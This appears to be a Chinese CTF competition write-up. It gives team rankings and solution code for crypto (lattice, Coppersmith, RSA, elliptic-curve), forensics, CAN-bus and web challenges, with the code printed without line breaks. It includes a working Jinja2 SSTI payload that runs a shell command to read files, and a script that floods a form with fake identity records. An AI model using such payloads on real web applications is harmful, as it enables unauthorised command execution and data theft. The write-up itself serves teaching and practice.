声明:本文内容仅供学习交流,所有因传播利用文章内相关技术造成的不良后果均由使用者本人负责,与本公众号和文章作者无关。如需转载,请注明出处,未经作者允许不得随意删改本文内容。
晋级
| 队伍 |
yulin666 |
人数 |
3 |
| 实践题排名 |
1 |
实践题分数 | 3932.60 |
| 队伍 |
郫县男子技校 | 人数 |
3 |
| 实践题排名 |
6 |
实践题分数 | 2136.40 |
| 队伍 |
对不起我们是比狗还要差的大专生鼠鼠头鸭 |
人数 | 3 |
| 实践题排名 |
11 |
实践题分数 | 1733.90 |
解题过程
一、定向数据采集
from faker import Fakerdef fak():fa = Faker(locale='zh-CN')return fa.ssn()def datagen():idcard = fak() # 确保fak()函数返回一个有效的身份证号码字符串if int(idcard[-2]) % 2 == 0:sex = '女'else:sex = '男'# 假设身份证号码中的年份是第7到10位age = 2024 - int(idcard[6:10])data = {"name": "我草","sex": sex, # 直接使用变量sex"age": str(age), # 直接使用变量age"ethnicity": "汉族","idcard": idcard, # 直接使用变量idcard"phonenumber": "12392911923","address": "啊实打实大时代大萨达","position": "阿达撒大声地","experience": "12"}return dataimport requests# 设置请求头部headers = {'Host': '121.40.65.125:23930','Content-Length': '212','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36','Content-Type': 'application/json;charset=UTF-8','Accept': '*/*','Origin': 'http://121.40.65.125:23930','Referer': 'http://121.40.65.125:23930/','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9','Connection': 'close',}for i in range(1200):data = datagen()# 设置POST请求的数据# 发送POST请求response = requests.post('http://121.40.65.125:23930/submit', headers=headers, json=data)# 打印响应if 'flag' in response.text:print(response.text)break
# 导入必要的SageMath库from sage.all import *# 原始数据S = 231282844744M = [27811518167, 19889199464, 19122558731, 19966624823, 25670001067,30690729665, 23936341812, 31011714749, 30524482330, 21737374993,17530717152, 19140841231, 33846825616, 17334386491, 28867755886,29354544582, 21758322019, 27261411361, 31465376167, 26145493792,27075307455, 33514052206, 25397635665, 21970496142, 30801229475,22405695620, 18486900933, 27071880304, 17919853256, 18072328152,21108080920]# 构造增广矩阵(包含目标值S作为最后一列)A = Matrix(ZZ, len(M), len(M) + 1)for i in range(len(M)):for j in range(len(M)):if j == i:A[i, j] = 2 # 单位矩阵的对角线元素设为2else:A[i, j] = 0 # 单位矩阵的非对角线元素设为0A[i, len(M)] = M[i] # 最后一列设置为M的元素A[len(M) - 1, len(M)] = S # 最后一行的最后一个元素设置为S# 执行格基约减A_reduced = A.LLL() # 使用LLL算法进行格基约减# 查找可能的解for row in A_reduced.rows():# 检查行是否只包含-1, 0, 1if all(x in [-1, 0, 1] for x in row):# 提取解,忽略最后一列(即目标值S)solution = [0 if x == 0 else (1 if x == 1 else -1) for x in row[:-1]]print("Found solution:", solution)break # 假设只找到一个解就停止else:print("No solution found.")# 如果你需要将整数解转换为字节def int_to_bytes(n):return n.to_bytes((n.bit_length() + 7) // 8, byteorder='big')# 假设solution是一个整数列表,你可以这样转换# solution_bytes = [int_to_bytes(x) for x in solution]
using namespace std;typedef long long LL;const LL maxn = 1e9+10,N=2*1e5+120,g=239,mod=1e9 + 7,cmod=998244353,INF=1e16;int n,m,k,q;LL M[]={685, 2019, 1262, 769, 630, 527, 1192, 1634, 1357, 661, 1164, 784, 2048, 2000, 1239, 1302, 1816, 1918, 1724, 1961, 1831, 1620, 732, 1756, 807, 875, 1940, 1095, 1702, 1514, 1651, 1206, 845, 869, 1638, 935, 1485, 1678, 1407, 696, 828, 841, 1058, 1167, 1478, 1582, 683, 1486, 1372, 1781, 671, 1564, 877, 565, 1519, 1449, 1773, 664, 1355, 1993, 843, 1332, 1943, 1931, 716, 635, 1863, 1271, 2019};LL C[] = {11881, 11491, 11114};void dfs(int k,LL as1,LL as2,LL as3,LL z){if(as1==C[0]&&as2==C[1]&&as3==C[2])printf("%lldn",z);if(k==23){if(as1==C[0]&&as2==C[1]&&as3==C[2])printf("%lldn",z);return;}if(as1>C[0]||as2>C[1]||as3>C[2]) return;dfs(k+1,as1+M[k],as2+M[k+23],as3+M[k+46],(z<<1)^1);dfs(k+1,as1,as2,as3,(z<<1));return;}int b[31];int main(){dfs(0,0,0,0,0);return 0;}
同时两次交互来解密secret后发现每次解密出的secret都一样,判断secret是个常数,于是直接交这个secret=5000268
from pwn import *r=remote('121.40.65.125',29514)print(r.recvline())print(r.recvline())print(r.recvline())print(r.recvline())r.sendline(b'5000268')print(r.recvline())
结果为
flag{U9VFwHBY3tk46wM4zKav}
看代码发现e很小,并且n未给出任何分解相关的有效信息,于是直接去facrordb网站上查询n,失败了。再然后发现两次c1,c2对应的m1,m2只有name有区别,且程序中给出了name的长度20,于是m1,m2只有连续160的比特回有区别。开始时试图分解出name1和name2,失败了。
于是转换思路试图求解出name1-name2,首先由于不知道name的具体所在位置,所以要爆破枚举name的所在位置。然后列出两个c1和c2的方程,
用结点消元法消去y,转变为x的单变量方程,由于x是一个160比特大小的数,分析发现x最高次是9,可以用铜匠攻击,求解出方程小根
直接调用small_roots方法求解出name1-name2
for i in range(3,512):f = (x*(2^(i*8))+y)^3-c2g = (y)^3-c1h = f.sylvester_matrix(g, y).det().univariate_polynomial().monic()#print(h)print(i)roots=h.small_roots(X=2^(160),beta=0.5)if len(roots)!=0:print(roots)
之后观察f,g这两个方程式存在公共根的,于是对这两个方程求gcd,再把得到的多项式化成y-C的形式(C是一个常数)
再转换C为bytes得到结果
f = (cs1*(2^(ilen*8))+y)^3-c2g = (y)^3-c1def gcd(ux,uy):while uy:ux,uy=uy,ux%uyreturn uxprint(gcd(f,g))
n = 568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136139831000566777869918466156880089327163065068626898059287985228258082737620000000279896747890757319085381631511173307825511583906098352616444664784639501033857651875619579526808372015544289449630825737736069734585631737164678002506101904757713885951128904172308749831239593270099962357714449828976184968093339746550743879291082640824342416614313080244013521184173978725567256679980140028608635479169401328634544278604752913220323603960576165670347499629983898810503372179588691930448790663301146315112753895278701851939171098189289426351907555872008321093595413542315030724511959094814066961512647863851936300847205610378379468461090776667809852896300095279643331141021965338494497059637030460612114103972724295296066218378878321083520263808122442805624484709678389194358767917969953786151907151113054612259390820206281236656103050308732275671876578046759831954611695137121364671140004360818977230200260012108474639126819289473259618493019534134103467249869746345593299925296296576270840411168887985994517056879751144774547c1 = 431312103100767688301270873515694180462257583459908234203073002487325117493887047120595913906904515450437699824150951431203682143625472233283131484154340726407655916093919153094880725587387190657282541339852240866740558210935057304045622134333737364837907803284500720912477083278604674191761558055606257265613653371174413735704743368774112560256371957440166273363312892826954931938520339749763587237647531487364315671724711104121476132976721311150162435461040429472367051903062023684424445453470509770755251625919328562598684973145845411949679521293696654238536568271288227873235222254418381637988720403134737388969117301315129764877084098263887038702360875806169943329250942423481218879414262975949372263342542267307509991818876001663343080174068122745544889250468768262778036531643485618966462765400799197337845903384752263868544685704850009883890733780492467688079391036667616844591782969089061420721690202569906456519442030878032969214680094553153977362452465792210460969237703808838958554390073039156314586976508524382532218487645573442266610936598298297875467628751249793552304509948574237292979527475347029486469806949152294324189679630412632233400760461994879210062157065072372411916571806421837168282993333259037632027802003c2 = 111326641811759493604088523562272731454464716671194755315328363821292903187271753249420574406026395878690499347562021194039381824656168455890425774471881313917884834279782521293520897666098947728412358720613339825800136298612478019319813893005212230183582102418424882679301752156049958975894273766026631862041748967780800417583410741108884715313323900093310792257441808867208196444135018606731846323195653209862566605010692791815067942002776912439607453059083583034027686629599715307795110352640886758030641410333262371457801139341561118922116406804672110476329045310692884716196591553487627768331568194031497995162292372362355335942016715203357198021060493558898566979718960008685572625090545387509936034791555171957700118277390090007172285832465740027830724861313089424939667978089316596191454429096123617934705475390965480354286330548814947931157769714442311818706252505465905591041180883235830012150614876110315563201395578841723561829534311600512174988418799061640259280069741788731955575782711935172179986077118656212700160367567297188194157963591548015377609501024174395290161373145148594887695593674066706818905384618972001711737840675693775981586009982344466167108444473750394255025928855839837371545436570899099865485704861P.< x, y > = PolynomialRing(Zmod(n))x, y = P.gens()f1=(x+y)^3f2=(y)^3#c1=f1(2^170,2^1024+1)#c2=f2(0,2^1024+1)print(2^170)cs=568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136139831000566777869918466156880089327163065068626898059287985228258082737620000000279896747890757319085381631511173307825511583906098352616444664784639501033857651875619579526808372015544289449630825737736069734585631737164678002506101904757713885951128904172308749831239593270099962357714449828976184968093339746550743879291082640824342416614313080244013521184173978725567256679980140028608635479169401328634544278604752913220323603960576165670347499629983898810503372179588691930448790663301146315112753895278701851939171098189289426351907555872008321093595413542315030724511959094814066961512647863851936300847205610378379468461090776667809852896300095279643331141021965338494497059637030460612114103972724295296066218378878321083520263808122442805624484709678389194358767917969953786151907151113054612259390820206281236656103050308732275671876578046759831954611695137121364671140004360818977230200260012108474639126819289473259618493019534134103467249869746345593299925296274073696996381973296121109312481072817280748704cs1=22502573844029195591864885204575806933864025843ilen=401'''for i in range(3,512):f = (x*(2^(i*8))+y)^3-c2g = (y)^3-c1h = f.sylvester_matrix(g, y).det().univariate_polynomial().monic()#print(h)print(i)roots=h.small_roots(X=2^(160),beta=0.5)if len(roots)!=0:print(roots)'''f = (cs1*(2^(ilen*8))+y)^3-c2g = (y)^3-c1def gcd(ux,uy):while uy:ux,uy=uy,ux%uyreturn uxprint(gcd(f,g))xs=75912276473669370492298543347489880882773184257255675346190757278499807262137750152580304830223847787218142856869420597971534775471907679278040934206557685373184266313381208309068838212838502311538830720988831533214248668824198103758646468141425377684473018941153132570437817730031044736601406029756057895378290209666927514287545305811245434020201363496043921922552321321126173021212450829031458685397581502464841897657009193822066907904684339567048411893205561557592977890167095203746880001363613413161762486225378900275078831684881550125418710637157317902134382771991649241897758050208635097455945624610479238760215459249788713237230939641234367985660885344708381298766463738210528110849089495838322027724918453000449420935494688171096708547375568470761643778949127956491347135215910114064088683866498270442573042009097594149341693488160937694041585415781751211830583548152317931753421463175521121102522187877611512662866409081438494276393480651283300762883391326604411207285122908490316872263401272946127097988275496547977580302678315505248789471022905739897255329480907640672240470969826076822070363607205528100519325442252558602480189485785203746417911685302044470866623664245347676765090437304521368252757713621825087005564745*y + 249232217447088470017517108532603127647764257231000945606085312343234346642887365573442281891869769573193103809755295005726512948757236723602454366353511322552078203027626328672305530936471332104632068874639021398521141789822008410100566592052144344486764112549833834277894475216405534618656813055976695234344939793969826767235805703568281467044597504160229853401409155512262288680012947215577931092260083233508796579091976557540249899478018883690697564923485431460667780393001915193375256503503266661591463436753250455175675443472187207664310828013636954735651610659845300464092447549538010651864118369569643385989028285347684532913171184569598522190650832934939889916673796900283686359627961384997454512932208052324830350287129526552464117306919240730692089198552066151648221281139803059921708054245746722477829012007595944346291809326829061589655388120563852888555191506731646365114387914597282226318925565157964489075260040098871199811850010522652705956032546776166705080580225160655649392437968020952027410597067308517954169176021203342485946036066103258811091183560926704740999740310353512576181269562376008687822036728706979881848612778922653363446106218734485474774034508565328665848013661791639232681913537490241624318983744cm=75912276473669370492298543347489880882773184257255675346190757278499807262137750152580304830223847787218142856869420597971534775471907679278040934206557685373184266313381208309068838212838502311538830720988831533214248668824198103758646468141425377684473018941153132570437817730031044736601406029756057895378290209666927514287545305811245434020201363496043921922552321321126173021212450829031458685397581502464841897657009193822066907904684339567048411893205561557592977890167095203746880001363613413161762486225378900275078831684881550125418710637157317902134382771991649241897758050208635097455945624610479238760215459249788713237230939641234367985660885344708381298766463738210528110849089495838322027724918453000449420935494688171096708547375568470761643778949127956491347135215910114064088683866498270442573042009097594149341693488160937694041585415781751211830583548152317931753421463175521121102522187877611512662866409081438494276393480651283300762883391326604411207285122908490316872263401272946127097988275496547977580302678315505248789471022905739897255329480907640672240470969826076822070363607205528100519325442252558602480189485785203746417911685302044470866623664245347676765090437304521368252757713621825087005564745import gmpy2 as gpxs*=inverse_mod(cm,n)print(xs)xs2=568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136136320995282543074035456056821931776470915459802161035016774910328986323340064723823601358191192724326897349341597000502102018631267199460843264681292311278559465587545719505802671193017964123780363464984077169577833257842589087942545276588392897000332340550822498650429085280357344996478980952876619349606741147197410253135312645035706822347924220099206191876612630068512879551466747348560267800605986697904702251260531364811486554500270930656471997860752246468793935111330200606840355795453673113970438981705435468450471884398372219505972709294983913670835986800227446394410918642907986850955958428639639813925170880382756290935355535155879203798768953032780036589159992638959383219122749581355954232065366797744698220209644443749723244099427237525488376104293995954432591882841220426836527029117318470886992558897709256375615937928900838071657874723813335223008696832349205866902136097335625642357536470120937486648558982174937790178247148170436277149203031706385440784727319730858994878198282598771650570593052976558642print(long_to_bytes(int(xs2)))print(long_to_bytes(int(n-xs2)))print('ok')
flag{oirh398ryhw9iufs3}
题中很明显存在多个小量s,t,delta,考虑格攻击
有等式 $sP+tQ+delta+k*n=leak$,题目给出P,Q, n, leak,分析s,t,delta,k都是一个小量,于是直接造格,来获取。
有以下关系,同时在最后一列配上大系数X,保证规约出0
$$ left[ matrix{ s & t &delta & k & 1 } right]*left[ matrix{ 1 & & & & p&1&&&Q&&1&&1&&&1&n&&&&-leak } right] =left[ matrix{ s & t &delta & k & 0 } right]$$
代码如下
P = 91307300383014465303389363075431698588933838431961163766796972428733255940234665671679789435258337578396879726483195947952476118985507696067550566875810703327064257916213956673893327976728584687137639337961422903593701591152074826447530099276756806166361533554689114264018344629905535188048343259754284652017Q = 149089411480331249267443825847904508235946280550542428853480950085018092182435890098430254117786823782088885695848943795846175490059759543848516828825072642481794902650586147465149175976488985613001468444893241645390860978312924241181340390543064512602477917112031391367608345501790785857442379515898677467337n = 97339579366356507946846401691835843338581994635020856947574389213640653953117584127557153363761256108433474475102197685296591968229050609482457622390855692102761025647645801250282912327521623082583744902369819132264725498938021235699466656447009532567358416017236962637028458839659218745744825556065623673913N = 72077628115206161977315177371814064093288033362281459918751639032623658967593542855291047617938064177930014574391486973767462937337649946356572406647109942552336519343063401327708412361664750917582404375485334706345485264831286788789648126355202140531434534406410829696252616051882952860015344370516517084357909896281965899571934196572691leak = 45439323369250400352006541741265096780554398472451037280607564706700682873365442581062404781075514235328183754475227917775810587457541607767765455164339314322631781126065808432845447798024685402323868389611285038950397054020330610558058133599416135943335731904873776868614834960217751934513462319743149481906c = 31456530156035981140909630437789986968079386074106871160743980387785993275753486380185420818239283975922682050323918081691381897642776414263991442096807392948925867761878299044300335666219533277719472330029607869735373712681522022301659090108633692457216985013550482473362675907949633024047291607542103649091410575340884845190483766424507hint = 13318665442465244206832303588726230530847297247590371628366697082014350966833522479782161994817212671730145702818662148370306660550486536176566012104254910mar=matrix(ZZ,[[0 for i in range(5)]for j in range(5)])X=2^1024for i in range(4):mar[i,i]=1mar[4,4]=-leak*Xmar[3,4]=n*Xmar[2,4]=1*Xmar[1,4]=Q*Xmar[0,4]=P*Xprint(mar.LLL()[0])s,t,delta,k,z=mar.LLL()[0]p=hint+sq=n//pprint(p*q==n)e = 65537phi=(p-1)*(q-1)*(delta-1)d=inverse(e,phi)m=pow(c,d,N)print(long_to_bytes(int(m)))
flag{499959682502a9ee664412774d995c85}
本题就是给了四个点。于是有四个在模p中的方程,椭圆曲线方程 y^2=x^3+a*x+b
有四个方程
$y1^2=x1^3 +a*x1+b quad(modquad p)$
$y2^2=x2^3 +a*x2+bquad (mod quad p)$
$y3^2=x3^3 +a*x3+bquad (modquad p)$
$y4^2=x4^3 +a*x4+bquad (modquad p)$
消除b的影响,有三个方程
$y1^2 - y2^2=x1^3 -x2^3+a*(x1-x2) quad(modquad p)$
$y2^2 - y3^2=x2^3 -x3^3+a*(x2-x3)quad (modquad p)$
$y3^2 - y4^2=x3^3 -x4^3+a*(x3-x4)quad (modquad p)$
再消除a的影响,有两个方程
$(x2-x3)(y1^2-y2^2)-(x2-x3)(x1^3-x2^3)-(x1-x2)((y2^2-y3^2)-(x2^3-x3^3))=0 quad(modquad p)$$(x2-x3)(y3^2-y4^2)-(x2-x3)(x3^3-x4^3)-(x3-x4)((y2^2-y3^2)-(x2^3-x3^3))=0quad(modquad p)$
代入求值,再gcd得到kp,再扔进yafu里分解得到p
然后列出原始四个方程,用groebner解出a,b
最后flag的形式应为flag='flag{' + hashlib.sha256(str((a+b+p)%p ).encode()).hexdigest() +'}'
代码如下
x1,y1=326672433563808078860194887521653547089556740597 , 184497841037716044508112339838233572527979342579x2,y2=946940648888016429117035739241938283924071224831 , 321676290528200789029428639046110268747006565356x3,y3=466606422274774582389917703171293585058211734594 , 1074845338842713759215696692888593660449409944456x4,y4=800969026528232354813204405831803185648593796532 ,716443765574481260039522236141448382825732855234f1=(x2-x3)*(y1^2-y2^2)-(x2-x3)*(x1^3-x2^3)-(x1-x2)*((y2^2-y3^2)-(x2^3-x3^3))f2=(x2-x3)*(y3^2-y4^2)-(x2-x3)*(x3^3-x4^3)-(x3-x4)*((y2^2-y3^2)-(x2^3-x3^3))print(gcd(f1,f2))p=abs(gcd(f1,f2))from Crypto.Util.number import isPrimep= 1147718459924575949776230905228771300694578329241print(abs(gcd(f1,f2))//11==p)print(isPrime(int(p)))F = []PR.<a,b> = PolynomialRing(Zmod(p))f=y1^2-(x1^3+a*x1+b)F.append(f)f=y2^2-(x2^3+a*x2+b)F.append(f)f=y3^2-(x3^3+a*x3+b)F.append(f)f=y4^2-(x4^3+a*x4+b)F.append(f)res = Ideal(F).groebner_basis()print(res)a=p-562057997528662832671979630483769294719057055570b=p-767226941590139107595679281744178365913055475754print(f'a={a}')print(f'b={b}')print(f'p={p}')print(y1^2%p==(x1^3+a*x1+b)%p)print(y2^2%p==(x2^3+a*x2+b)%p)print(y4^2%p==(x4^3+a*x4+b)%p)import hashlibprint(int(a)+int(b)+int(p))print((int(a)+int(b)+int(p))%p)flag='flag{' + hashlib.sha256(str(int(a)+int(b)+int(p)).encode()).hexdigest() +'}'print(flag)print('flag{'+hashlib.sha256(str(int(966151980730349959284802898229594940757044127158)).encode()).hexdigest()+'}')print('flag{'+hashlib.sha256(str(int(2113870440654925909061033803458366241451622456399)).encode()).hexdigest()+'}')
$flag{b785a320839a4a51dc206d2ee72ebb2b9039dbed06b43c7c6164a3ce0151eb7b}$
import hashlibimport itertoolsfrom string import digits, ascii_letters, punctuationfrom pwn import *from z3 import Int, Solvercontext.log_level = 'debug'def sha(tail, sha256):alpha_bet=digits+ascii_letters+punctuationstrlist = itertools.product(alpha_bet, repeat=4)xxxx=''for i in strlist:data=i[0]+i[1]+i[2]+i[3]data_sha=hashlib.sha256((data+tail).encode('utf-8')).hexdigest()if data_sha==sha256:xxxx=databreakreturn xxxx.encode('utf-8')def solve(arr):count = 0for i in range(3):for j in range(3):if arr[i][j] == 'X':count += 1else:arr[i][j] = int(arr[i][j])ans = [Int(f'ans[{i}]') for i in range(count)]tmp = 0for i in range(3):for j in range(3):if arr[i][j] == 'X':arr[i][j] = ans[tmp]tmp += 1s = Solver()s.add(arr[0][0] + arr[0][1] + arr[0][2] == arr[1][0] + arr[1][1] + arr[1][2])s.add(arr[1][0] + arr[1][1] + arr[1][2] == arr[2][0] + arr[2][1] + arr[2][2])s.add(arr[0][0] + arr[1][0] + arr[2][0] == arr[0][1] + arr[1][1] + arr[2][1])s.add(arr[0][1] + arr[1][1] + arr[2][1] == arr[0][2] + arr[1][2] + arr[2][2])s.add(arr[0][0] + arr[1][1] + arr[2][2] == arr[0][2] + arr[1][1] + arr[2][0])print(arr)if s.check():m = s.model()count = 0for i in range(3):for j in range(3):if type(arr[i][j]) == int:continuearr[i][j] = m[ans[count]].as_long()count += 1print(arr)res = f"{arr[0][0]} {arr[0][1]} {arr[0][2]}n{arr[1][0]} {arr[1][1]} {arr[1][2]}n{arr[2][0]} {arr[2][1]} {arr[2][2]}n"return resr = remote('121.40.65.125', 29175)s = r.recvline().decode('utf-8').replace('n', '').replace('[+] sha256(XXXX+', '')slist = s.split(') == ')xxxx = sha(slist[0], slist[1])r.recvuntil(b'[+] Plz tell me XXXX: ')r.sendline(xxxx)r.recvline()l1 = r.recvline().decode('utf-8').replace('n', '').split(' ')l2 = r.recvline().decode('utf-8').replace('n', '').split(' ')l3 = r.recvline().decode('utf-8').replace('n', '').split(' ')arr = []arr.append(l1)arr.append(l2)arr.append(l3)magic = solve(arr)r.sendline(magic)r.interactive()
ZIP数据结构,利用WinRar打开压缩包,密码为1114514,得到的内容镜像一下提交。
ATT协议,发现存在heart_rate_measurement关键词,直接过滤一下查看最大的即可。
# 过滤条件: btatt.heart_rate_measurement.value.8# flag: Mi Smart Band 5_Redmi K40_128
32010620021128173,发现缺少了最后一位,由于身份证号的最后一位是校验位,因此可以通过前面17位来进行计算,缺失的数字为3。
def calculate_last_digit(id17):weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]validate_list = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']sum = 0for i in range(0, len(id17)):sum += int(id17[i]) * weights[i]return validate_list[sum % 11]id17 = '32010620021128173'print(calculate_last_digit(id17))
app.py源码中泄露了登录用户名和密码,登录后存在SSTI模板注入,由于area和id字段的长度都不能超过20,因此将payload拆开来,利用config.update来在config全局对象中分段保存payload。
{{config.update(u=lipsum.__globals__)}}{{config.u.os.popen('cat /f*').read()}}
q的值并不大,因此可以通过枚举q来逆推出n,从而求解m。
#!/usr/bin/env python3# -*- coding: utf-8 -*-# from secret import flag,initfrom Crypto.Util.number import *# from sage.all import *from gmpy2 import *# m = bytes_to_long(flag.encode())# r = getPrime(128)# p = init# # for i in range(r-1):# # p += next_prime(init)# # assert iroot(p,3)[1] == 1# q = getPrime(12)# # N = p*q*r# N = r**4*q# e = getPrime(17)# c = pow(m,e,N)# print(f"r = {r}")# print(f"e = {e}")# print(f"c = {c}")r = 287040188443069778047400125757341514899e = 96001c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625for i in range(1000,5000):if isPrime(i):phi = (r-1)*r*r*r*(i-1)d = invert(e, phi)m = pow(c, d, r**4*i)if b'flag' in long_to_bytes(m):print(long_to_bytes(m))exit(0)# r = 287040188443069778047400125757341514899# e = 96001# c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625
图片中给了x,y,z三个参数的限制条件,因为构建Z3表达式来求解所有可能得组合,得到随机数种子,从而计算KEY,反解被加密文件。
from z3 import *from Crypto.Cipher import AESimport randomx, y, z = BitVecs('x y z', 32)s = Solver()s.add(0 <= x, x <= 100)s.add(0 <= y, y <= 100)s.add(0 <= z, z <= 100)s.add(x * y != z)s.add(x ^ y == z)s.add((x + y) * z == x * x + y * y)s.add(x != y)while s.check() == sat:f=s.model()s.add(Or(x != s.model()[x], y != s.model()[y], z != s.model()[z]))rx=f[x].as_long()ry=f[y].as_long()rz=f[z].as_long()random.seed(rx+ry+rz)key = random.randbytes(16)PATH = "encrypted_flag.bin"with open(PATH, "rb") as file_in:nonce = file_in.read(16)tag = file_in.read(16)ciphertext = file_in.read()cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)data = cipher.decrypt_and_verify(ciphertext, tag)print("The flag is:", data)
解零宽字符得到K|2+YG3-hfl|&_U8,然后解Base92,FLAG为flag{wangdalei}。
↓
xss钓鱼,打textarea的payload。
uncompyle6 -o 1.py secret.pycimport randomdef decrypt_file(encrypted_file_path):random.seed(114514) # 使用相同的种子以获得相同的随机数序列with open(encrypted_file_path, "rb") as encrypted_file:encrypted_data = encrypted_file.read()decrypted_data = b''for byte in encrypted_data:key = random.randint(0, 128)decrypted_data += chr(byte ^ key).encode()decrypted_file_path = encrypted_file_path.replace(".enc", ".dec")with open(decrypted_file_path, "wb") as decrypted_file:decrypted_file.write(decrypted_data)return decrypted_file_pathdecrypted_file_path = decrypt_file("flag.enc")print(f"Decrypted file saved as: {decrypted_file_path}")%# flag{U_R_g00d_at_do1n_pyc}
canplayer没有办法直接重放,用脚本先进行处理。
import re# # 读取CAN消息日志文件with open('candump-2024-01-22.log', 'r') as file:can_data = file.read()# 使用正则表达式提取每条CAN消息的信息can_messages = re.findall(r'((d+.d+)) vcan0 (w+)#(w+)', can_data)# 将CAN消息转换为canplayer格式canplayer_format = ''for timestamp, can_id, can_data in can_messages:canplayer_format += f'({timestamp}) vcan0 {can_id}#{can_data}n'# # 保存转换后的文件with open('canplayer-format.log', 'w') as file:file.write(canplayer_format)print('转换完成,新文件保存为canplayer-format.log')
ICSim模拟,可以看到速度表上会突然彪一个很高的速度,但是模拟速度太快了看不太清,然后考虑时间戳以及异常速度,异常速度的指令次数肯定是最少的 直接sort uniq就可以找到了,先把指令过滤出来。
import re# 读取 candump 日志文件with open('canplayer-format.log', 'r') as file:lines = file.readlines()# 定义正则表达式模式pattern = r'(d+.d+) vcan0 (w+#w+)'# 创建输出文件with open('can_messages.txt', 'w') as output_file:# 遍历每一行数据for line in lines:# 使用正则表达式匹配数据match = re.match(pattern, line)if match:can_message = match.group(1)output_file.write(can_message + 'n')cat can_messages.txt | sort | uniq -c | sort -n
244#000000F60000对了。
END
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论